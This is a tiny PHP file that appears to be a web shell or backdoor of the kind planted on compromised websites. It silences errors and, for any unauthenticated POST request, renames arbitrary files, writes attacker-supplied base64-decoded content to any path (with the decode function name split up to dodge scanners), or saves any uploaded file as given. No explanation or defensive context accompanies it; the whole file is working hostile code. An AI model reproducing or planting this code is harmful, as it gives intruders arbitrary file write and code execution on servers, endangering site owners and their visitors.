<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'ba'.'se64'.'_d'.'ec'.'ode'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>